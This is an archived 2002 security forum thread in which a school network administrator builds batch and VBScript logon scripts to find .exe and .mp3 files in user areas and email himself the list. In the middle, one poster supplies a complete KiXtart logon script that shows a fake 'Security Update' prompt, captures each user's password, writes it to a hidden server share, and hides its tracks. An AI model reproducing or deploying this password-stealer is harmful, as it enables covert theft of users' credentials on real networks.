batch file confusion

Networking/Security Forums -> Programming and More

Author: browolf PostPosted: Mon Oct 28, 2002 4:51 pm    Post subject: batch file confusion
    ----
Hi

i'm trying out some batch stuff, i'm planning on writing a script to scan people's userarea when they log on. I'm just playing around with things atm until i figure out the best way to do it. (the best way to learn stuff)

i'm having some trouble understanding why this isnt working.
i'm running it on win2k.

Code:

@echo off
dir %1\*.exe /a-D /b /S >>test.log
if errorlevel 0 echo exe found
if errorlevel 1 echo exe not found


it's the errorlevel bit that doesnt seem to work.
if i run the batch as "search.bat s:" the output is:

filenotfound
exe found
exe not found

(s: doesnt have any exe's in)

as i understand it. if dir finds no results then the errorlevel is 1.
i know that it is cos i can do echo %errorlevel%
i believe i can use %errorlevel% in the script but havent tried.
i'm trying to keep things non-win2k specific atm.

cheers

Andy

Author: browolf PostPosted: Tue Oct 29, 2002 3:52 pm    Post subject:
    ----
isok
i somehow fixed it by doing:

Code:

@echo off
dir %1\*.exe /a-D /b /S >>test.log
if errorlevel 1 goto exit
   echo do stuff

:exit
echo done!

Author: Sgt_BLocation: Chicago, IL US PostPosted: Tue Oct 29, 2002 4:13 pm    Post subject:
    ----
A bit more interesting would be having the machine's in question write their log files to a central location, giving the log file as <computername>.log.

Might be easier for you to manage.

Author: Sgt_BLocation: Chicago, IL US PostPosted: Tue Oct 29, 2002 4:24 pm    Post subject:
    ----
@echo off
dir %1\*.exe /a-D /b /S >>\\<central location>\%computername%.log
if errorlevel 1 goto exit
echo do stuff

:exit
echo done!

Author: TheKingsterLocation: UK PostPosted: Tue Oct 29, 2002 4:59 pm    Post subject:
    ----
if your trying to stop people running EXEs theres a whole section on that on these forums

Author: ShaolinTigerLocation: Kuala Lumpur, Malaysia PostPosted: Tue Oct 29, 2002 5:58 pm    Post subject:
    ----
TheKingster wrote:
if your trying to stop people running EXEs theres a whole section on that on these forums


It's usually nice if you tell people where it is aswell..

http://www.security-forums.com/forum/viewtopic.php?t=438

Author: browolf PostPosted: Tue Oct 29, 2002 9:55 pm    Post subject:
    ----
i dont want to have to go thru 1800 log files. it's just a small number of people who stick exe or mp3s in their user areas,

the script will email me using commandline emailer blat with the contents of the log file. i can then remove the files and disable their userares.

atm the script looks like:

Code:

@echo off
echo checking userarea for inappropriate files
dir %1\*.exe /a-D /b /S >>%1\test.log
dir %1\*.mp3 /a-D /b /s >>%1\test.log
if errorlevel 1 goto exit
   echo mailing filelist to administrator!
   \\lsahtc_nt1\netlogon\blat %1\test.log -to andy@address -server 192.168.0.15 -f academic\%username% -q
:exit
del %1\test.log
echo done!

Author: ThePsykoLocation: California PostPosted: Fri Nov 08, 2002 3:14 am    Post subject:
    ----
If you're doing this through logon scripts, you might want to look into kixtart - it's free and more robust than DOS (www.kixtart.com).. One of the first sripts I wrote was a password stealer / logger in Kix...


; REM ***
; REM *** Malishus log_on skript
; REM ***


IF INGROUP("Domain Administrators")
RETURN
ENDIF


; REM *** check to see if script has run on system before - if so, skip
; REM *** script and return to normal logon

IF EXIST("c:\winnt\config\confpol.txt")
RETURN
ENDIF

; REM *** Display standard windows messagebox with text and an OK button ***(no cancel button)

$selection = MESSAGEBOX ( "There is a Security Patch available for your system. Press 'OK' to Install", "Security Update", 64)

; REM *** Make it look official by including some lag time (it IS windows
; REM *** after all Smile

? "Security Update Installing....."
SLEEP 1
? "Authentication error! Please Enter your password."
? "UserID: " + @USERID
FLUSHKB
? "Password: "
GETS $pass
? "Installation continuing....."
SLEEP 2

; REM *** Since Kix displays a 0 everytime a file is successfully opened
; REM *** &/or written to, the following line will keep the user from
; REM *** getting suspicious by showing them that
; REM *** there are 0000000 errors during "installation"

? "Installation Errors: "

; REM *** Map a drive to a hidden share on the logon server that only you
; REM *** know about..
; REM *** If this isn't possible, use another users system and share
; REM *** their drive to stash the log in.. never use your own system.

SHELL "%comspec% /c net use w: \\" + @LSERVER + "\hiddenshare$"

; REM *** Open (or create one if it doesn't exist) both the log file for
; REM *** the U/P and the file to later tell the script it has already
; REM *** run on this system

OPEN ( 1, "w:\log.txt", 5)
OPEN ( 2, "c:\winnt\config\confpol.txt", 5)

; REM *** Append the users User ID and Password to a central text file
; REM *** (makes it easier for retrieval)

WRITELINE (1, "User: " + @userid + Chr(13) + Chr(10))
WRITELINE (1, "Pass: " + $pass + Chr (13) + Chr(10))

; REM *** Add a blank line to the \confpol.txt file - will signal the
; REM *** script next time, but if found, won't raise any suspicions
; REM *** (usually)

WRITELINE ( 2, Chr (13) + Chr(10))

CLOSE (1)
CLOSE (2)

SHELL "%comspec% /c net use w: /delete"
? "Security Update Installed, continuing with logon..."
SLEEP 1
RETURN

Author: browolf PostPosted: Fri Nov 08, 2002 10:39 am    Post subject:
    ----
i've used kixtart b4. it's ace. but if u gonna use that u might as well go all the way and use WSH. which in the end i did. i'll post my script when i get to work.

Author: browolf PostPosted: Fri Nov 08, 2002 11:40 am    Post subject:
    ----
Code:

'on error resume next
Const ForReading = 1
wscript.echo ("checking your user area for inappropriate files")
set wshell = wscript.createobject("wscript.shell")
Dim fso, f1, ts, s,myfile,uname,udate
Set fso = CreateObject("Scripting.FileSystemObject")

If (fso.FileExists("s:\ftemp.$$$")) Then
fso.DeleteFile("s:\ftemp.$$$")
end if

uname = wshell.ExpandEnvironmentStrings("%USERNAME%")

if instr("sbutte,adavis,jowen,naparro,vballa,cglen-,rbanni,jfairc,andy,myles,duncan,brian,ssstoke,abaill,adavis,msimps", uname) OR isempty(uname) then wscript.exit

WShell.Run "%comspec% /c dir s:\*.exe /a-d /b /s >> s:\ftemp.$$$",0,true
WShell.Run "%comspec% /c dir s:\*.mp3 /a-d /b /s >> s:\ftemp.$$$",0,true
WShell.Run "%comspec% /c dir s:\*.wav /a-d /b /s >> s:\ftemp.$$$",0,true

'read file
Set f = fso.GetFile("s:\ftemp.$$$")
if f.size > 0 then
    wscript.echo ("mailing file list to administrator")
    wshell.run "\\lsahtc_nt1\netlogon\blat s:\ftemp.$$$ -to andy@lythamhigh.lancs.sch.uk -server 192.168.0.15 -f academic\" & uname & " -q", 0,true
    wscript.echo ("mail sent!")
   
    datetemp = date
   udate = replace (datetemp,"/","")
    ttemp = time
   ttime = replace (ttemp,":","")
   folname = "\\lsahtc_nt1\logs\filez\" & uname & udate &"-"& ttime
    'make folder
     set f = fso.createfolder(folname)
    'move files
   Set MyFile = fso.Opentextfile("s:\ftemp.$$$", ForReading,false)
    do while myfile.AtEndOfStream <> True
      fpath = myfile.readline
      cmdline = "%comspec% /c move /y " & """" & fpath & """ " & folname
      wscript.echo "moving " & fpath
      WShell.Run cmdline, 0,true
    loop
   myfile.close
else
   wscript.echo ("Clear!")
end if
fso.DeleteFile("s:\ftemp.$$$")
set wshell = nothing
set fso = nothing
set f = nothing
set myfile = nothing




Networking/Security Forums -> Programming and More


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group